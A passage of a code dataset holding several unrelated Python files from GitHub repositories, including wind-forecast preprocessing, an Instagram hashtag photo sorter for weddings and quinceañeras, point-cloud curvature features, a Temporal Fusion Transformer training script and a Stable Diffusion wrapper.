pd.to_datetime(data[['year', 'month', 'day', 'hour']])\n\n first_date = datetime.datetime(year=from_year, month=1, day=1)\n last_date = datetime.datetime(year=to_year, month=1, day=1)\n\n data = data[(data['date'] >= first_date) & (data['date'] < last_date)]\n\n if decompose_periodic:\n data = decompose_periodic_features(data, features)\n if norm:\n data[features], mean_or_min, std_or_max = get_normalization_values(data[features].values, normalization_type)\n return data, mean_or_min, std_or_max\n\n return data\n\n\ndef decompose_periodic_features(data: pd.DataFrame, all_features: List[str]):\n for feature in SYNOP_PERIODIC_FEATURES:\n min = feature['min']\n max = feature['max']\n column = feature['column'][1]\n series_to_reduce = pd.to_numeric(data[column])\n period_argument = ((series_to_reduce - min) / (max - min)).astype(np.float64) * 2 * np.pi\n data.insert(data.columns.get_loc(column), f'{column}-cos', np.cos(period_argument).tolist())\n data.insert(data.columns.get_loc(column), f'{column}-sin', np.sin(period_argument).tolist())\n data.drop(columns=[column], inplace=True)\n all_features = modify_feature_names_after_periodic_reduction(all_features)\n return data\n\n\ndef drop_zeros_series(data: pd.DataFrame, features: [str], min_series_len_to_remove: int):\n indices_to_remove = []\n for feature in features:\n series_list = data[feature].values\n consecutive_zeros = 0\n for index, val in enumerate(series_list):\n if val == 0 and index != len(series_list) - 1:\n consecutive_zeros += 1\n else:\n if consecutive_zeros >= min_series_len_to_remove or val == 0:\n indices_to_remove.extend(list(range(index - consecutive_zeros, index)))\n if val == 0:\n indices_to_remove.append(index)\n consecutive_zeros = 0\n\n return data.drop(data.index[indices_to_remove])\n\n\ndef modify_feature_names_after_periodic_reduction(features: list):\n new_features = features\n for feature in SYNOP_PERIODIC_FEATURES:\n index = new_features.index(feature['column'][1])\n new_features.insert(index, f'{feature[\"column\"][1]}-cos')\n new_features.insert(index, f'{feature[\"column\"][1]}-sin')\n new_features.remove(feature['column'][1])\n return new_features\n","repo_name":"adambelniak/WindForecast","sub_path":"src/wind_forecast/preprocess/synop/synop_preprocess.py","file_name":"synop_preprocess.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"38359980447","text":"# author : Ryan\n# datetime: 2021/11/24 19:37\n# software: PyCharm\n\n\"\"\"\ndescription:\n\n\"\"\"\nfrom typing import List\n\n\nclass Lad:\n\n def longArrayDivide(self, array: List[int], low: int, mid: int, high: int) -> int:\n lef_sum = float('-inf')\n seq_sum = 0\n max_left = -1\n for i in range(mid, low, -1):\n seq_sum = seq_sum + array[i]\n if seq_sum > lef_sum:\n lef_sum = seq_sum\n max_left = i\n rig_sum = float('-inf')\n seq_r_sum = 0\n max_right = -1\n for j in range(mid + 1, high):\n seq_r_sum = seq_r_sum + array[j]\n if seq_r_sum > rig_sum:\n rig_sum = seq_r_sum\n max_right = j\n return (max_left, max_right), lef_sum + rig_sum\n\n\nif __name__ == '__main__':\n lad = Lad()\n array = [13, -3, -25, 20, -3, -16, -23, 18, 20, -7, 12, -5, -22, 15, -4, 7]\n low, mid, high = 0, len(array) // 2, len(array) - 1\n print(lad.longArrayDivide(array, low, mid, high))\n","repo_name":"EngineerFan/py-demo","sub_path":"src/algorithm/LongArrayDivide.py","file_name":"LongArrayDivide.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21787791770","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nquince_dict = {\n 'dress': 'prep',\n 'hair': 'prep',\n 'excite': 'prep',\n 'makeup': 'prep',\n 'make up': 'prep',\n 'escort': 'prep',\n 'ready': 'prep',\n 'florals': 'prep',\n 'flower': 'prep',\n 'table': 'prep',\n 'silverware': 'prep',\n 'placesetting': 'prep',\n 'decor': 'prep',\n 'planning': 'prep',\n 'arrange': 'prep',\n 'design': 'prep',\n 'entrance': 'prep',\n 'banquet': 'prep',\n 'hall':'prep',\n 'venue':'prep',\n 'music': 'dance',\n 'waltz': 'dance',\n 'father daughter': 'dance',\n 'fatherdaughter': 'dance',\n 'dj': 'dance',\n 'dance': 'dance',\n 'dancing': 'dance',\n 'groov': 'dance',\n 'shake': 'dance',\n 'disco': 'dance',\n 'rock': 'dance',\n 'boogie': 'dance',\n 'shimmy': 'dance',\n 'strut': 'dance',\n 'sway': 'dance',\n 'baila': 'dance',\n 'choreograph': 'dance',\n 'cake': 'food',\n 'bake': 'food',\n 'baked': 'food',\n 'dessert': 'food',\n 'cut': 'food',\n 'tier': 'food',\n 'yum': 'food',\n 'food': 'food',\n 'bar': 'food',\n 'chocolate': 'food',\n 'fruit': 'food',\n 'drink': 'food',\n 'cheers': 'food',\n 'delicious': 'food',\n 'catering': 'food',\n 'sugar': 'food',\n 'confection': 'food',\n 'photograph':'photoshoot',\n 'pic': 'photoshoot',\n 'shot': 'photoshoot',\n 'model': 'photoshoot',\n 'headshot': 'photoshoot',\n 'photoshoot': 'photoshoot',\n 'booth': 'photobooth',\n 'friend':'familyandfriends',\n 'sister':'familyandfriends',\n 'uncle':'familyandfriends',\n 'brother':'familyandfriends',\n 'mom':'familyandfriends',\n 'dad':'familyandfriends',\n 'father':'familyandfriends',\n 'mother':'familyandfriends',\n 'sibling':'familyandfriends',\n 'aunt':'familyandfriends',\n 'grandm':'familyandfriends',\n 'grandp':'familyandfriends',\n 'fam':'familyandfriends',\n 'squad':'familyandfriends',\n 'crew':'familyandfriends',\n 'people':'familyandfriends'\n}\n\n\nwedding_dict = {\n 'wedding dress': 'wedding prep',\n 'gown': 'wedding prep',\n 'tuxedo': 'wedding prep',\n 'wedding hair': 'wedding prep',\n 'excite': 'wedding prep',\n 'makeup': 'wedding prep',\n 'make up': 'wedding prep',\n 'ready': 'wedding prep',\n 'florals': 'wedding prep',\n 'venue': 'prelude',\n 'open air': 'prelude',\n 'outdoor': 'prelude',\n 'wedding guest': 'prelude',\n 'welcome': 'prelude',\n 'here comes': 'prelude',\n 'comes the bride': 'prelude',\n 'bridesmaids': 'prelude',\n 'maid of honor': 'prelude',\n 'best man': 'prelude',\n 'groomsmen': 'prelude',\n 'parents': 'prelude',\n 'just married': 'prelude',\n 'music': 'recessional',\n 'march': 'recessional',\n 'down the aisle': 'recessional',\n 'reception': 'reception',\n 'new husband': 'reception',\n 'new wife': 'reception',\n 'bouquet': 'reception',\n 'toss': 'reception',\n 'wedding favor': 'reception',\n 'dinner': 'reception',\n 'champagne': 'reception',\n 'garter': 'reception',\n 'toast': 'reception',\n 'speech': 'reception',\n 'twirl': 'first dance',\n 'first dance': 'first dance',\n 'dancing floor': 'first dance',\n 'lights down': 'first dance',\n 'dancing': 'first dance',\n 'dance': 'first dance',\n 'dancing shoes': 'first dance',\n 'cake': 'cake',\n 'bake': 'cake',\n 'baked': 'cake',\n 'dessert': 'cake',\n 'cut': 'cake',\n 'tier': 'cake',\n 'i now pronounce you': 'vows',\n 'man and wife': 'vows',\n 'mr. and mrs.': 'vows',\n 'mister and misses': 'vows',\n 'manandwife': 'vows',\n 'i do': 'vows',\n 'vow': 'vows',\n 'ring exchange': 'vows',\n 'ring': 'vows',\n 'diamond': 'vows',\n 'true love': 'vows',\n 'tie the knot': 'vows',\n 'love is patient': 'vows',\n 'love is kind': 'vows',\n 'you may now kiss': 'kiss',\n 'mwah': 'kiss',\n 'smooch': 'kiss',\n 'kiss': 'kiss',\n}\n\n#Extract the numer of posts under a hashtag\ndef number_of_post(soup):\n\n cont = soup.find(\"meta\", {\"name\": \"description\"})\n if cont:\n cont = cont['content']\n else:\n return None\n\n total_post = int(cont.split(' ')[0])\n\n if total_post < 11:\n maxphoto = total_post\n elif total_post < 15:\n maxphoto = total_post * 0.9\n elif total_post < 20:\n maxphoto = total_post * 0.8\n elif total_post < 30:\n maxphoto = total_post * 0.7\n else:\n maxphoto = total_post * 0.6\n\n return int(maxphoto)\n\n# returns photos prioritizing covering categories and then likes\ndef return_photos_wedding(result_temp,maxphoto):\n count = 0\n wedding_prep = []\n prelude = []\n recessional = []\n reception = []\n first_dance = []\n cake = []\n vows = []\n kiss = []\n other = []\n seen = []\n while count < maxphoto:\n for set_name, photo_set in result_temp.items():\n if photo_set != set([]) and count < maxphoto:\n photo, seen = best_photo(photo_set, seen)\n\n if len(photo) != 0:\n count = count + 1\n if set_name == \"cake\":\n cake.append(photo)\n elif set_name == \"kiss\":\n kiss.append(photo)\n elif set_name == \"first dance\":\n first_dance.append(photo)\n elif set_name == \"wedding_prep\":\n wedding_prep.append(photo)\n elif set_name == \"vows\":\n vows.append(photo)\n elif set_name == \"reception\":\n reception.append(photo)\n elif set_name == \"recessional\":\n recessional.append(photo)\n elif set_name == \"prelude\":\n prelude.append(photo)\n elif set_name == \"what also happened\":\n other.append(photo)\n seen.append(photo)\n\n\n result = {\"Preparation\":wedding_prep, \"Prelude\":prelude, \"Vows\":vows, \"Kiss\":kiss,\n \"Recessional\":recessional, \"Reception\":reception, \"First Dance\":first_dance,\"Sweet Time\":cake,\n \"What also Happened\":other}\n\n return result\n\n# returns photos prioritizing covering categories and then likes\ndef return_photos_quince(result_temp,maxphoto):\n count = 0\n prep = []\n dance = []\n food = []\n photobooth = []\n photoshoot = []\n familyandfriends = []\n other = []\n seen = []\n\n while count < maxphoto:\n for set_name, photo_set in result_temp.items():\n\n if photo_set != set([]) and count < maxphoto:\n photo, seen = best_photo(photo_set, seen)\n if len(photo) != 0:\n count = count + 1\n if set_name == \"food\":\n food.append(photo)\n elif set_name == \"dance\":\n dance.append(photo)\n elif set_name == \"qui_prep\":\n prep.append(photo)\n elif set_name == \"photobooth\":\n photobooth.append(photo)\n elif set_name == \"photoshoot\":\n photoshoot.append(photo)\n elif set_name == \"familyandfriends\":\n familyandfriends.append(photo)\n elif set_name == \"what also happened\":\n other.append(photo)\n seen.append(photo)\n\n\n result = {\"Preparation\":prep, \"Looking Good\":photoshoot, \"Get down\":dance, \"Yumyum\":food, \"Photobooth\":photobooth,\n \"Family and Friends\":familyandfriends, \"What also Happened\":other}\n\n return result\n\n\n# returns most liked photo from a set of photos\ndef best_photo(photo_set, seen):\n most_likes = 0\n best_photo = set()\n\n for photo in photo_set:\n if int(photo[1]) >= int(most_likes) and not photo in seen:\n most_likes = photo[1]\n best_photo = photo\n\n return best_photo, seen\n\n\n# Extract author of each post\ndef extract_username(shortcode):\n url = \"https://www.instagram.com/p/\" + shortcode + \"/\"\n r = requests.get(url)\n page = r.text\n soup = BeautifulSoup(page, 'html.parser')\n\n cont = soup.find(\"meta\", {\"name\":\"description\"})['content']\n username = cont.split('@')[1].split(')')[0]\n\n return username\n\n\n\n# Extract and return images based on keywords\n# Input: soup\n# Output: a dict of links with subevents\ndef extract_wedding_images(soup):\n\n max_post = number_of_post(soup)\n if max_post is None:\n return {\"Preparation\":[],\"Prelude\":[],\"Vows\":[],\"Kiss\":[],\n \"Recessional\":[], \"Reception\":[],\"First Dance\":[], \"Sweet Time\": [],\n \"What also happened\": []}\n\n\n scripts = soup.find_all('script')\n all_info = scripts[3].text.strip()\n\n wedding_prep = []\n prelude = []\n recessional = []\n reception = []\n first_dance = []\n cake = []\n vows = []\n kiss = []\n other = []\n\n nodes = all_info.split(\"\\\"node\\\":\")\n for x in nodes:\n if \"text\" in x and \"display_url\" in x:\n text = x.split('},')[0].lower()\n\n # extract username\n # temporary remove this part for faster processing\n shortcode = x.split('\"shortcode\":\"')[1].split('\",')[0]\n username = \"@\" #+ extract_username(shortcode)\n\n liked_count = x.split('\"edge_liked_by\":{\"count\":')[1].split('}')[0]\n jpg_link = x.split('\"display_url\":\"')[1].split('\"')[0]\n flag = 0\n\n # Search for a keyword in \"text\", and save corresponding url\n for keyword in wedding_dict.keys():\n if keyword in text:\n if wedding_dict.get(keyword) == \"cake\":\n cake.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"kiss\":\n kiss.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"first dance\":\n first_dance.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"wedding prep\":\n wedding_prep.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"vows\":\n vows.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"reception\":\n reception.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"recessional\":\n recessional.append((jpg_link,liked_count,username))\n flag = 1\n elif wedding_dict.get(keyword) == \"prelude\":\n prelude.append((jpg_link,liked_count,username))\n flag = 1\n if not flag == 1:\n other.append((jpg_link,liked_count,username))\n\n\n result_temp = {\"wedding_prep\":set(wedding_prep),\"prelude\":set(prelude),\"vows\":set(vows),\"kiss\":set(kiss),\n \"recessional\":set(recessional), \"reception\":set(reception),\"first dance\":set(first_dance), \"cake\": set(cake),\n \"what also happened\": set(other)}\n\n\n result = return_photos_wedding(result_temp,max_post)\n\n return result\n\n\n# Extract and return images based on keywords\n# Input: soup\n# Output: a dict of links with subevents\ndef extract_quince_images(soup):\n max_post = number_of_post(soup)\n\n if max_post is None:\n return {\"Preparation\": [], \"Looking Good\": [], \"Get down\": [], \"Yumyum\": [],\n \"Photobooth\": [], \"Family and Friends\": [], \"what also happened\": []}\n\n scripts = soup.find_all('script')\n all_info = scripts[3].text.strip()\n\n prep = []\n photoshoot = []\n dance = []\n food = []\n photobooth = []\n familyandfriends = []\n other = []\n\n\n nodes = all_info.split(\"\\\"node\\\":\")\n for x in nodes:\n if \"text\" in x and \"display_url\" in x:\n text = x.split('},')[0].lower()\n\n # extract username\n # temporary remove this part for faster processing\n shortcode = x.split('\"shortcode\":\"')[1].split('\",')[0]\n username = \"@\" #+ extract_username(shortcode)\n\n liked_count = x.split('\"edge_liked_by\":{\"count\":')[1].split('}')[0]\n jpg_link = x.split('\"display_url\":\"')[1].split('\"')[0]\n flag = 0\n\n # Search for a keyword in \"text\", and save corresponding url\n for keyword in quince_dict.keys():\n if keyword in text:\n if quince_dict.get(keyword) == \"familyandfriends\":\n familyandfriends.append((jpg_link,liked_count,username))\n flag = 1\n if quince_dict.get(keyword) == \"photobooth\":\n photobooth.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"dance\":\n dance.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"prep\":\n prep.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"photoshoot\":\n photoshoot.append((jpg_link,liked_count,username))\n flag = 1\n elif quince_dict.get(keyword) == \"food\":\n food.append((jpg_link,liked_count,username))\n flag = 1\n\n if not flag == 1:\n other.append((jpg_link,liked_count,username))\n\n\n result_temp = {\"qui_prep\":set(prep),\"photoshoot\":set(photoshoot),\"dance\":set(dance),\"food\": set(food),\n \"photobooth\": set(photobooth),\"familyandfriends\":set(familyandfriends), \"what also happened\": set(other)}\n\n result = return_photos_quince(result_temp,max_post)\n\n return result\n\n\n\n\nif __name__ == '__main__':\n event_type = input(\"Please enter the type of your event: \")\n\n tag = input(\"Please enter a hashtag of your event: \")\n url = \"https://www.instagram.com/explore/tags/\" + tag + \"/\"\n\n\n r = requests.get(url)\n page = r.text\n soup = BeautifulSoup(page, 'html.parser')\n\n\n if event_type == \"wedding\":\n photos = extract_wedding_images(soup)\n elif event_type == \"quince\":\n photos = extract_quince_images(soup)\n else:\n print(\"Error! Check your input!\")\n\n\n print(\"Links of images: \")\n for k,v in photos.items():\n print(k)\n for x in v:\n print(x)\n print()\n","repo_name":"macchiatoyn/WeddingAlbum","sub_path":"Wedding_Album.py","file_name":"Wedding_Album.py","file_ext":"py","file_size_in_byte":14827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42909908486","text":"import open3d as o3d\nimport numpy as np\nimport sympy as sp\nimport math\nimport scipy as scp\nfrom Utilities import *\nimport functools\n@vectorize\nclass Signature:\n \n def __init__(self,pointcloud=None,KDT=None,point_index=None):\n self.pointcloud=pointcloud\n self.point_index=point_index\n self.KDT = KDT\n if pointcloud!=None:\n self.pointCoordinates=np.asarray(self.pointcloud.points)[point_index]\n def set_signatures(self,kmin,kmax,knor,minCurv,maxCurv,normal):\n self.Kmin=kmin\n self.Kmax=kmax\n self.Knor=knor\n self.minCurv=minCurv\n self.maxCurv=maxCurv\n self.normal=normal\n self.ratio=self.Kmin/self.Kmax\n self.Sum=self.Kmin+self.Kmax+self.Knor\n self.Omnivariance=(self.Kmin*self.Kmax*self.Knor)**(1/3)\n #self.Eigenentropy=-(self.Kmin*math.log(self.Kmin)+self.Kmax*math.log(self.Kmax)+self.Knor*math.log(self.Knor))\n self.Anistropy=(self.Kmax-self.Knor)/self.Kmax\n self.Planarity=(self.Kmin-self.Knor)/self.Kmax\n self.Linearity=(self.Kmax-self.Kmin)/self.Kmax\n self.surfaceVariation=self.Knor/(self.Sum)\n self.sphericity=self.Knor/self.Kmax\n self.lineFeature=0\n self.K1_K3=self.Kmax-self.Kmin\n self.K1_K2=self.Kmax-self.Knor\n self.K1_K2_K3=self.Kmax-self.Knor-self.Kmin\n self.ratio_dis=(self.Knor/self.Kmin)-1\n\n def set_2D_signatures(self,kmin,kmax,knor,minCurv,maxCurv,normal):\n self.Kmax=kmax\n self.Knor=knor\n self.maxCurv=maxCurv\n self.normal=normal\n #self.ratio=self.Kmin/self.Kmax\n self.Sum=self.Kmax+self.Knor\n self.Omnivariance=(self.Kmin*self.Kmax*self.Knor)**(1/3)\n #self.Eigenentropy=-(self.Kmin*math.log(self.Kmin)+self.Kmax*math.log(self.Kmax)+self.Knor*math.log(self.Knor))\n self.Anistropy=(self.Kmax-self.Knor)/self.Kmax\n self.Planarity=(self.Kmin-self.Knor)/self.Kmax\n self.Linearity=(self.Kmax-self.Kmin)/self.Kmax\n self.surfaceVariation=self.Knor/(self.Sum)\n self.sphericity=self.Knor/self.Kmax\n self.lineFeature=0\n self.K1_K3=self.Kmax-self.Kmin\n self.K1_K2=self.Kmax-self.Knor\n self.K1_K2_K3=self.Kmax-self.Knor-self.Kmin\n self.ratio_dis=(self.Knor/self.Kmin)-1\n\n def build(self,NN_Criteria=\"RNN\",NN=20,rad=0.6):\n Normals=np.zeros([3,1])\n MinCurDir=np.zeros([3,1])\n MaxCurDir=np.zeros([3,1])\n NormalVal=np.zeros([1,1])\n MinCurVal=np.zeros([1,1])\n MaxCurVal=np.zeros([1,1])\n [N,K1,K2]=getPrincipalDir(self.pointcloud,self.pointCoordinates,self.KDT,NN_Criteria,NN,rad)\n Normals=N[1]\n MinCurDir=K1[1]\n MaxCurDir=K2[1]\n NormalVal=N[0]\n MinCurVal=K1[0]\n MaxCurVal=K2[0]\n self.set_signatures(MinCurVal,MaxCurVal,NormalVal,MinCurDir,MaxCurDir,Normals)\n\n def dimension(self,rigid):\n if rigid:\n return 2\n else:\n return 1\n\n def is_umbilical(self,criteria,th):\n if criteria==\"ratio\":\n return abs(self.ratio)<th\n elif criteria==\"sphericity\":\n return abs(self.sphericity)>th\n\n def flatten(self,rigid):\n if rigid:\n return [self.Kmin,self.Kmax]\n else:\n return [self.Kmin/self.Kmax]\n\n @vectorize\n def v_build(self,signature,NN_Criteria=\"RNN\",NN=20,rad=0.6):\n Normals=np.zeros([3,1])\n MinCurDir=np.zeros([3,1])\n MaxCurDir=np.zeros([3,1])\n NormalVal=np.zeros([1,1])\n MinCurVal=np.zeros([1,1])\n MaxCurVal=np.zeros([1,1])\n [N,K1,K2]=getPrincipalDir(signature.pointcloud,signature.pointCoordinates,signature.KDT,NN_Criteria,NN,rad)\n Normals=N[1]\n MinCurDir=K1[1]\n MaxCurDir=K2[1]\n NormalVal=N[0]\n MinCurVal=K1[0]\n MaxCurVal=K2[0]\n signature.set_signatures(MinCurVal,MaxCurVal,NormalVal,MinCurDir,MaxCurDir,Normals)\n\n @vectorize\n def v_flatten(self,signature,rigid):\n if rigid:\n return (signature.Kmin,signature.Kmax)\n else:\n return [signature.Kmin/signature.Kmax]\n","repo_name":"grmc1999/Structural_recognition","sub_path":"Simetrias/Utils/Signatures.py","file_name":"Signatures.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34346505826","text":"#найти последнюю цифру n-го числа Фибоначчи (1 <= n <= 10**7)\n\ndef fib(n):\n # put your code here\n arr = []\n arr.append(0)\n arr.append(1)\n for i in range(2,n+1):\n arr.append((arr[i-1] + arr[i-2]) % 10)\n return arr[n]\n\ndef main():\n n = int(input())\n print(fib(n))\n\n\nmain()","repo_name":"data-hex/algorithms","sub_path":"fibbonacci_last_digit.py","file_name":"fibbonacci_last_digit.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4937768870","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport expt_settings.configs\nimport tft_model\nfrom data_formatters import window_generator\nfrom losses.pinball_loss import PinballLoss\nfrom losses.mae_loss import MAELoss\nfrom losses.rce_loss import RCELoss\n\npd.options.display.max_columns = 1000\n\nExperimentConfig = expt_settings.configs.ExperimentConfig\nconfig = ExperimentConfig('gas_production', 'outputs')\ndata_formatter = config.make_data_formatter()\ndata_csv_path = config.data_csv_path\n# train_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTrain.csv')\n# valid_csv_path = os.path.join(config.data_folder, 'GasProductionTFTValid.csv')\n# train_and_val_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTrainAndVal.csv')\n# test_csv_path = os.path.join(config.data_folder, 'GasProductionTFTTest.csv')\n\nif __name__ == '__main__':\n raw_data = pd.read_csv(data_csv_path, index_col=0)\n train, valid, test, train_and_val = data_formatter.split_data(raw_data)\n # if not os.path.exists(test_csv_path) or not os.path.exists(valid_csv_path) or not os.path.exists(train_csv_path)\\\n # or not os.path.exists(train_and_val_csv_path):\n # train, valid, test, train_and_val = data_formatter.split_data(raw_data)\n # train.to_csv(train_csv_path, index=False)\n # valid.to_csv(valid_csv_path, index=False)\n # train_and_val.to_csv(train_and_val_csv_path, index=False)\n # test.to_csv(test_csv_path, index=False)\n # else:\n # train = pd.read_csv(train_csv_path)\n # valid = pd.read_csv(valid_csv_path)\n # train_and_val = pd.read_csv(train_and_val_csv_path)\n # test = pd.read_csv(test_csv_path)\n # Sets up default params\n data_formatter.set_scalers(train)\n mean, std = data_formatter.get_mean_std()\n # Use all data for label encoding to handle labels not present in training.\n fixed_params = data_formatter.get_experiment_params()\n\n params = data_formatter.get_default_model_params\n fixed_params.update(params)\n\n fixed_params['batch_first'] = True\n fixed_params['device'] = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n fixed_params['quantiles'] = [0.5]\n\n elect = window_generator.TSDataset(fixed_params, data_formatter.transform_inputs(train), num_samples=256)\n loader = DataLoader(\n elect,\n batch_size=fixed_params['minibatch_size'],\n num_workers=4,\n shuffle=False\n )\n\n valid_ds = window_generator.TSDataset(fixed_params, data_formatter.transform_inputs(valid), num_samples=1)\n valid_loader = DataLoader(\n valid_ds,\n batch_size=fixed_params['minibatch_size'],\n num_workers=4,\n shuffle=False\n )\n\n model = tft_model.TFT(fixed_params).to(fixed_params['device'])\n\n # q_loss_func = RMSSELoss(fixed_params['device'])\n # q_loss_func = SMAPELoss(fixed_params['device'])\n # q_loss_func = QuantileLoss(fixed_params['quantiles'])\n q_loss_func = PinballLoss(0.50, fixed_params['device'])\n mae_loss_func = MAELoss(mean, std, fixed_params['device'])\n\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n model.train()\n losses_mae = []\n losses_rce = []\n for i in range(fixed_params['num_epochs']):\n epoch_loss_train_mae = []\n progress_bar = tqdm(enumerate(loader))\n for batch_num, batch in progress_bar:\n optimizer.zero_grad()\n output, all_inputs, attention_components = model(batch['inputs'])\n # output.shape = [batch_size, forecast_horizon, 1],\n # all_inputs = [batch_size, total_time_steps, 5]\n loss = q_loss_func(output.squeeze(2), batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), fixed_params['max_gradient_norm'])\n optimizer.step()\n\n mae_loss = mae_loss_func(output.squeeze(2),\n batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n\n epoch_loss_train_mae.append(mae_loss.item())\n print(\"Epoch {}: MAE Train Loss = {}\".format(i, np.mean(epoch_loss_train_mae)))\n\n epoch_loss_eval_mae = []\n for idx, batch in enumerate(valid_loader):\n with torch.no_grad():\n output, all_inputs, attention_components = model(batch['inputs'])\n mae_loss = mae_loss_func(output.squeeze(2),\n batch['outputs'][:, :, 0].float().to(fixed_params['device']))\n\n epoch_loss_eval_mae.append(mae_loss.item())\n print(\"Epoch {}: MAE Eval Loss = {}\".format(i, np.mean(epoch_loss_eval_mae)))\n losses_mae.append(np.mean(epoch_loss_eval_mae))\n\n if np.mean(epoch_loss_eval_mae) <= min(losses_mae):\n torch.save(model.state_dict(), config.model_folder + '/gas_production_best_model_loss.pth')\n","repo_name":"gaosuqi/GasWell","sub_path":"gas_tft/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17816004079","text":"from typing import Optional, List\n\nimport numpy as np\nimport torch\nfrom cv2 import dilate\nfrom diffusers import DDIMScheduler, StableDiffusionPipeline\nfrom tqdm import tqdm\n\nfrom src.attention_based_segmentation import Segmentor\nfrom src.attention_utils import show_cross_attention\nfrom src.prompt_to_prompt_controllers import DummyController, AttentionStore\n\n\ndef get_stable_diffusion_model(args):\n device = torch.device(f'cuda:{args.gpu_id}') if torch.cuda.is_available() else torch.device('cpu')\n if args.real_image_path != \"\":\n scheduler = DDIMScheduler(beta_start=0.00085, beta_end=0.012, beta_schedule=\"scaled_linear\", clip_sample=False, set_alpha_to_one=False)\n ldm_stable = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", use_auth_token=args.auth_token, scheduler=scheduler).to(device)\n else:\n ldm_stable = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", use_auth_token=args.auth_token).to(device)\n\n return ldm_stable\n\ndef get_stable_diffusion_config(args):\n return {\n \"low_resource\": args.low_resource,\n \"num_diffusion_steps\": args.num_diffusion_steps,\n \"guidance_scale\": args.guidance_scale,\n \"max_num_words\": args.max_num_words\n }\n\n\ndef generate_original_image(args, ldm_stable, ldm_stable_config, prompts, latent, uncond_embeddings):\n g_cpu = torch.Generator(device=ldm_stable.device).manual_seed(args.seed)\n controller = AttentionStore(ldm_stable_config[\"low_resource\"])\n diffusion_model_wrapper = DiffusionModelWrapper(args, ldm_stable, ldm_stable_config, controller, generator=g_cpu)\n image, x_t, orig_all_latents, _ = diffusion_model_wrapper.forward(prompts,\n latent=latent,\n uncond_embeddings=uncond_embeddings)\n orig_mask = Segmentor(controller, prompts, args.num_segments, args.background_segment_threshold, background_nouns=args.background_nouns)\\\n .get_background_mask(args.prompt.split(' ').index(\"{word}\") + 1)\n average_attention = controller.get_average_attention()\n return image, x_t, orig_all_latents, orig_mask, average_attention\n\n\nclass DiffusionModelWrapper:\n def __init__(self, args, model, model_config, controller=None, prompt_mixing=None, generator=None):\n self.args = args\n self.model = model\n self.model_config = model_config\n self.controller = controller\n if self.controller is None:\n self.controller = DummyController()\n self.prompt_mixing = prompt_mixing\n self.device = model.device\n self.generator = generator\n\n self.height = 512\n self.width = 512\n\n self.diff_step = 0\n self.register_attention_control()\n\n\n def diffusion_step(self, latents, context, t, other_context=None):\n if self.model_config[\"low_resource\"]:\n self.uncond_pred = True\n noise_pred_uncond = self.model.unet(latents, t, encoder_hidden_states=(context[0], None))[\"sample\"]\n self.uncond_pred = False\n noise_prediction_text = self.model.unet(latents, t, encoder_hidden_states=(context[1], other_context))[\"sample\"]\n else:\n latents_input = torch.cat([latents] * 2)\n noise_pred = self.model.unet(latents_input, t, encoder_hidden_states=(context, other_context))[\"sample\"]\n noise_pred_uncond, noise_prediction_text = noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + self.model_config[\"guidance_scale\"] * (noise_prediction_text - noise_pred_uncond)\n latents = self.model.scheduler.step(noise_pred, t, latents)[\"prev_sample\"]\n latents = self.controller.step_callback(latents)\n return latents\n\n\n def latent2image(self, latents):\n latents = 1 / 0.18215 * latents\n image = self.model.vae.decode(latents)['sample']\n image = (image / 2 + 0.5).clamp(0, 1)\n image = image.cpu().permute(0, 2, 3, 1).numpy()\n image = (image * 255).astype(np.uint8)\n return image\n\n\n def init_latent(self, latent, batch_size):\n if latent is None:\n latent = torch.randn(\n (1, self.model.unet.in_channels, self.height // 8, self.width // 8),\n generator=self.generator, device=self.model.device\n )\n latents = latent.expand(batch_size, self.model.unet.in_channels, self.height // 8, self.width // 8).to(self.device)\n return latent, latents\n\n\n def register_attention_control(self):\n def ca_forward(model_self, place_in_unet):\n to_out = model_self.to_out\n if type(to_out) is torch.nn.modules.container.ModuleList:\n to_out = model_self.to_out[0]\n else:\n to_out = model_self.to_out\n\n def forward(x, context=None, mask=None):\n batch_size, sequence_length, dim = x.shape\n h = model_self.heads\n q = model_self.to_q(x)\n is_cross = context is not None\n context = context if is_cross else (x, None)\n\n k = model_self.to_k(context[0])\n if is_cross and self.prompt_mixing is not None:\n v_context = self.prompt_mixing.get_context_for_v(self.diff_step, context[0], context[1])\n v = model_self.to_v(v_context)\n else:\n v = model_self.to_v(context[0])\n\n q = 